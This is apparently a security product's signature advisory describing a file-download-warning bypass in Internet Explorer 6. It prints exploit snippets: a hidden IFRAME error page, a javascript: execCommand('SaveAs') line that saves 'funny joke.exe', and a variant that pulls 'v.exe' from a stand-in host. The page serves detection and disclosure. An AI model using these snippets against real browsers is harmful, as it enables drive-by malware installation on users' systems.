Technorati
Digg
Delicious
Reddit
StumbleUpon
Facebook
Yahoo
Twitter
Faves
Newsvine
Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.Description
This signature detects attempts to exploit a file download warning vulnerability in Internet Explorer.Additional Information
Microsoft Internet Explorer is reported prone to a file download security warning bypass vulnerability. This issue may be exploited to download a malicious file to the client system.When a URI location is not found the user usually receives a 404 error message. It is reported that this issue allows an attacker to create a custom HTTP 404 error message and use the 'execCommand' method to save a Web page to the local system.
The 'execCommand' method is used to execute a command on the current document. It is called in the following form:
object.execCommand(sCommand [, bUserInterface] [, vValue])
By using this method to execute the 'SaveAs' command on a document, the attacker can save it on the local system in the following manner:
document.execCommand('SaveAs','1','Name of the webpage.htm');
Internet Explorer warns a user when an attempt is made to download a file. The warning notifies the user of the dangers of downloading certain types of files. It is reported that this issue bypasses this security warning and also bypasses the 'Open File' security warning that appears when a downloaded executable is launched, which originates from an untrusted zone such as the Internet.
To carry out this attack, the attacker first modifies the Error Mapping Properties of a Web server such as IIS. The attacker places an IFRAME in the error document in the following manner:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>
This generates an error message, as the file specified in the IFRAME does not exist. The attacker also places malicious script code in the file in the following manner:
javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
It is reported that this code references malicious data in the frame 'NotFound' and pipes it to 'funny joke.exe'.
By enticing a user to follow a malicious link, the attacker can plant malicious files on vulnerable systems in order to execute malicious code.
**Update: A variation of the original exploit is available. This variation does not require that the IIS Error mapping properties are modified. Instead the IFRAME source address is set as 'http://example.com/v.exe?.htm'.
The JavaScript URI: 'javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');'
is also executed in this variation to reference the malicious 'v.exe?.htm' data in the frame 'NotFound' and pipe it to 'funny joke.exe'.
Affected
- Microsoft Internet Explorer 6.0, 6.0 SP1, 6.0 SP2